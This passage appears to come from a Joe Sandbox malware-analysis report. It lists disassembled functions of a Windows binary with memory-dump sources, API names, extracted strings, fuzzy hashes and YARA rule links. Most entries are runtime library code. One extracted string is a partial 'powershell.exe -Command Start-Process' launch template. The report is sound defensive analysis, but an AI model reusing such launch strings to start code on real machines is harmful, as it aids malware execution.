                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-1276376045
                                                                                    • Opcode ID: a92427a8a7a94bc3e110f6083a1c86e9f30f9f999ec61db51a8263dfc59daad0
                                                                                    • Instruction ID: c8e5ed73dab9b0d55f965bccab97c777dd54b59becef92e2e521b4941fda92e4
                                                                                    • Opcode Fuzzy Hash: a92427a8a7a94bc3e110f6083a1c86e9f30f9f999ec61db51a8263dfc59daad0
                                                                                    • Instruction Fuzzy Hash: 28F04F71A18602C1EB15AB24E474BB9A364AF85BF9FD40239D96D452E4CF2CD5479320
                                                                                    Function 00007FF767EFA490 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustPointer
                                                                                    • String ID:
                                                                                    • API String ID: 1740715915-0
                                                                                    • Opcode ID: d23c261393fe5d9345011d4d8cae44813ade9e9095501f5385085d884223d958
                                                                                    • Instruction ID: ba85485b686430d7af57cf5dd174882a962f737a4ce047e6b928896b605a3013
                                                                                    • Opcode Fuzzy Hash: d23c261393fe5d9345011d4d8cae44813ade9e9095501f5385085d884223d958
                                                                                    • Instruction Fuzzy Hash: 8CB1C031A4A682C1EB65BE159460638E3A4AF45BC4FCE8435EE4D0FF85DE2CE44B8760
                                                                                    Function 00007FF767F11C48 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _set_statfp
                                                                                    • String ID:
                                                                                    • API String ID: 1156100317-0
                                                                                    • Opcode ID: 5785710400c8fee3bac2d009e2e74cd863281d11c80b40594c2ba0b0a5132646
                                                                                    • Instruction ID: f22cdf373198a1e3cca0955668d7f59bd34751d0401c8be9c303c52a4c65aab5
                                                                                    • Opcode Fuzzy Hash: 5785710400c8fee3bac2d009e2e74cd863281d11c80b40594c2ba0b0a5132646
                                                                                    • Instruction Fuzzy Hash: 31118272E58A07C1F6653169E471BF5A3807FB43E0F890634E96E163D6CE2CA843D120
                                                                                    Function 00007FF767F04B6C Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF767EFF3EB,?,?,00000000,00007FF767EFF686,?,?,?,?,?,00007FF767EFF612), ref: 00007FF767F04B8B
                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF767EFF3EB,?,?,00000000,00007FF767EFF686,?,?,?,?,?,00007FF767EFF612), ref: 00007FF767F04BAA
                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF767EFF3EB,?,?,00000000,00007FF767EFF686,?,?,?,?,?,00007FF767EFF612), ref: 00007FF767F04BD2
                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF767EFF3EB,?,?,00000000,00007FF767EFF686,?,?,?,?,?,00007FF767EFF612), ref: 00007FF767F04BE3
                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF767EFF3EB,?,?,00000000,00007FF767EFF686,?,?,?,?,?,00007FF767EFF612), ref: 00007FF767F04BF4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value
                                                                                    • String ID:
                                                                                    • API String ID: 3702945584-0
                                                                                    • Opcode ID: 9293b31000964a656832f7149118382f3e1ddcbe4443de3bfe44b55614d61fc5
                                                                                    • Instruction ID: 587392420259ed64275c6372e499c913ce31e8e3b05ddfbc9fe702ff36563e25
                                                                                    • Opcode Fuzzy Hash: 9293b31000964a656832f7149118382f3e1ddcbe4443de3bfe44b55614d61fc5
                                                                                    • Instruction Fuzzy Hash: D9116D60A08242C1FA58B3696571DF9E3425F553E1F844735E43D0ABD6EE2CA4838621
                                                                                    Function 00007FF767F04A00 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value
                                                                                    • String ID:
                                                                                    • API String ID: 3702945584-0
                                                                                    • Opcode ID: 9fb129647e176cd3e0b6eefdf17869654c11ebd745b3a0b4e0b644a53c5f52b6
                                                                                    • Instruction ID: 1411825deb0915b316f48d7d1352871af45617ea9ddc7d940ffab2ca9fa279c5
                                                                                    • Opcode Fuzzy Hash: 9fb129647e176cd3e0b6eefdf17869654c11ebd745b3a0b4e0b644a53c5f52b6
                                                                                    • Instruction Fuzzy Hash: 8A111820E19203C1FD58B6754435DF9A3824F663F2E880B35E93E4A7C2ED2CB8934235
                                                                                    Function 00007FF767F09780 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                    • API String ID: 3215553584-1196891531
                                                                                    • Opcode ID: 38d272e447d5746b0ee3b6a85f6e63384077e4b6069fc838a17b2a89ee85e727
                                                                                    • Instruction ID: 199cfb4f91f615062f578a4db62834e0f03cb07063e532dc615ec49f9b875fd4
                                                                                    • Opcode Fuzzy Hash: 38d272e447d5746b0ee3b6a85f6e63384077e4b6069fc838a17b2a89ee85e727
                                                                                    • Instruction Fuzzy Hash: FA81C272D0C242C9F775EE288274AF8EB949F027C6FD59034DA4D56395EE2DA8038321
                                                                                    Function 00007FF767EFB804 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallEncodePointerTranslator
                                                                                    • String ID: MOC$RCC
                                                                                    • API String ID: 3544855599-2084237596
                                                                                    • Opcode ID: 30b907a34009c3924f1289ebb5dfadb100318b6469519c0968d5c3143115a71d
                                                                                    • Instruction ID: cd0fcc26f9e8eaecdcfe574afea44e1c91f9e06ba6ada99c5420533a595c359d
                                                                                    • Opcode Fuzzy Hash: 30b907a34009c3924f1289ebb5dfadb100318b6469519c0968d5c3143115a71d
                                                                                    • Instruction Fuzzy Hash: DA919373A08B81CAE711DF75D8502ADB7A0FB44788F98412AEA8D57B55DF3CD19ACB00
                                                                                    Function 00007FF767EF9E94 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                    • String ID: csm
                                                                                    • API String ID: 2395640692-1018135373
                                                                                    • Opcode ID: d73933c8cc523cdd2746a819842a37e00f423e6638d35d2228c426cfb4e16dea
                                                                                    • Instruction ID: 2c20a856746454924c1a24c8bc85a7c9e4ba6aa86357f22a73cf36038c24a014
                                                                                    • Opcode Fuzzy Hash: d73933c8cc523cdd2746a819842a37e00f423e6638d35d2228c426cfb4e16dea
                                                                                    • Instruction Fuzzy Hash: 2551B332B19602CADB14EF25E464A78B391EB44BD8FD84131FA8D47B48DF7DE84A8710
                                                                                    Function 00007FF767EFB594 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallEncodePointerTranslator
                                                                                    • String ID: MOC$RCC
                                                                                    • API String ID: 3544855599-2084237596
                                                                                    • Opcode ID: 0c9c0748ab2ccf05807d721b40c3b6d99c38ab84ebc95d48332250c1543fc0c9
                                                                                    • Instruction ID: 4e26282e2e539d60045cd87580db2a730f010a6c1572119007127f430ef29658
                                                                                    • Opcode Fuzzy Hash: 0c9c0748ab2ccf05807d721b40c3b6d99c38ab84ebc95d48332250c1543fc0c9
                                                                                    • Instruction Fuzzy Hash: 8A619032908BC5C1D720AF25E4503AAB7A0FB85BC4F884225EB8C47B95DF3CE199CB10
                                                                                    Function 00007FF767EFBD84 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                    • String ID: csm$csm
                                                                                    • API String ID: 3896166516-3733052814
                                                                                    • Opcode ID: ced92a26e68f8faf10be867b2926ed9b68afcc563360ef92477b975877ea4a75
                                                                                    • Instruction ID: b961ff5e359994e4a8bd7b93c07a98a89f6fa3949509d57d73fa241e539bfa60
                                                                                    • Opcode Fuzzy Hash: ced92a26e68f8faf10be867b2926ed9b68afcc563360ef92477b975877ea4a75
                                                                                    • Instruction Fuzzy Hash: 33519132908642CADB64AF219864369B7A0EB54BC4FD84135EA5D87F85CF3CE46ACB11
                                                                                    Function 00007FF767EF6290 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                    • String ID: bad locale name
                                                                                    • API String ID: 2775327233-1405518554
                                                                                    • Opcode ID: 1deee40651b4476868030aafa90c3e28cad5691699546a4096424e5a976d4dbe
                                                                                    • Instruction ID: 0cf08b9cbf84940730fe30782a7b4175e89aa7bba3949d8e48818e684070ccc1
                                                                                    • Opcode Fuzzy Hash: 1deee40651b4476868030aafa90c3e28cad5691699546a4096424e5a976d4dbe
                                                                                    • Instruction Fuzzy Hash: 7B413B32B0AA41CAFB14EF70D4A03AC63A4AF44788FC84435EA4D67E59DE3CD51AD364
                                                                                    Function 00007FF767EF6AA4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: GetTempPath2W$kernel32.dll
                                                                                    • API String ID: 1646373207-1846531799
                                                                                    • Opcode ID: 6c157fc2c9eb0bafc852afba0f6158d2a57fd74ca7526d9592526048dfbc2ed9
                                                                                    • Instruction ID: b155377452a1a24f11ed7d2db8793a0dedd9b42c9a9e1482281323ab08af1512
                                                                                    • Opcode Fuzzy Hash: 6c157fc2c9eb0bafc852afba0f6158d2a57fd74ca7526d9592526048dfbc2ed9
                                                                                    • Instruction Fuzzy Hash: 2CE0E572B14A46D1DE06AB11F9A48B5A321BFC8BC8FD55035C91D47324DE2CD44B8710
                                                                                    Function 00007FF767F05020 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                    • String ID:
                                                                                    • API String ID: 2718003287-0
                                                                                    • Opcode ID: c9748ac32c1102b20c7c6c1123d5a4a5edcc360f79a124e8f5ea6fbe1a7d5f71
                                                                                    • Instruction ID: 03a5b6a552d704ed8ce67b64bfbd9436668ef8aa5df8c89cf557a667f253707e
                                                                                    • Opcode Fuzzy Hash: c9748ac32c1102b20c7c6c1123d5a4a5edcc360f79a124e8f5ea6fbe1a7d5f71
                                                                                    • Instruction Fuzzy Hash: 81D10D32B08A80C9E712DF65C460AECB7A1FB44BD9B948236DE5D97B89DE78D447C310
                                                                                    Function 00007FF767EF1340 Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
                                                                                    • String ID:
                                                                                    • API String ID: 2138705365-0
                                                                                    • Opcode ID: 89188d226876ff831ad9afe282e06b0276ff154876618beabad931a82bcd60cb
                                                                                    • Instruction ID: 11de3c77c36e5b24c0ad700c1806423b91c69efb816fdd219942359b1719f3b9
                                                                                    • Opcode Fuzzy Hash: 89188d226876ff831ad9afe282e06b0276ff154876618beabad931a82bcd60cb
                                                                                    • Instruction Fuzzy Hash: D851C572A18BC5C1EB10AB24E4613A9A361FB997D4FC49231FA9C42B95EF3CD4C6C710
                                                                                    Function 00007FF767EF6C40 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharErrorLastMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 203985260-0
                                                                                    • Opcode ID: b21d51b5a1aba21564247d1ac1f2f6c5ee14a898047ebc4b39465d7037f73d6f
                                                                                    • Instruction ID: 6ab7bb6d2686621f190fed48e45ab49871ea317db5f721adfd32f85f1dcde070
                                                                                    • Opcode Fuzzy Hash: b21d51b5a1aba21564247d1ac1f2f6c5ee14a898047ebc4b39465d7037f73d6f
                                                                                    • Instruction Fuzzy Hash: 16212776A28B81C7E3609F12A45432EBBB4F799BD4FA40138EB8953B54DF3CD4068B14
                                                                                    Function 00007FF767EFBFBC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: __except_validate_context_record
                                                                                    • String ID: csm$csm
                                                                                    • API String ID: 1467352782-3733052814
                                                                                    • Opcode ID: ae2a62215a58026a0886f6dcf9f8c2e93cb3e5654c84a92589a235d849fb530a
                                                                                    • Instruction ID: 13842c43a167481ac7ff17061a9cb39d5c8ac5945e1c698ad7bf59dc8277681e
                                                                                    • Opcode Fuzzy Hash: ae2a62215a58026a0886f6dcf9f8c2e93cb3e5654c84a92589a235d849fb530a
                                                                                    • Instruction Fuzzy Hash: 0F71B672A08681C6E7606F25D460779B7A0EB05BC9FE88235EE4C47E95CF3CD55AC710
                                                                                    Function 00007FF767EFC654 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFrameInfo__except_validate_context_record
                                                                                    • String ID: csm
                                                                                    • API String ID: 2558813199-1018135373
                                                                                    • Opcode ID: 07cf4bfd112d551ea8757e3c0906a061ffaf6e6ee70d054fe60862b4d3bcdff6
                                                                                    • Instruction ID: 990b0835569f806b88dff9f8bf5568c79f5aa2b4ccc76825321e628a38f07e17
                                                                                    • Opcode Fuzzy Hash: 07cf4bfd112d551ea8757e3c0906a061ffaf6e6ee70d054fe60862b4d3bcdff6
                                                                                    • Instruction Fuzzy Hash: B3516D36608781C6DB20EB25E05026EB7A4F789BD4F980135EB8D4BB55CF3DE096CB10
                                                                                    Function 00007FF767EF66C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                    • String ID: powershell.exe -Command "Start-Process '
                                                                                    • API String ID: 73155330-2541463610
                                                                                    • Opcode ID: a5299bd422f5f1b3716e720325969913c96f5c5db3bfe6c2e7d02a0ae3824b60
                                                                                    • Instruction ID: 395f60ebbf2d416e964c6bc005f82702e499bef0ad4bda695d538ac4907e38a1
                                                                                    • Opcode Fuzzy Hash: a5299bd422f5f1b3716e720325969913c96f5c5db3bfe6c2e7d02a0ae3824b60
                                                                                    • Instruction Fuzzy Hash: 7041A472B08682C2EF10AB56D5242A9A351AB44BE0FD84735EA6D07FD5EE3CE54A8310
                                                                                    Function 00007FF767F056B8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
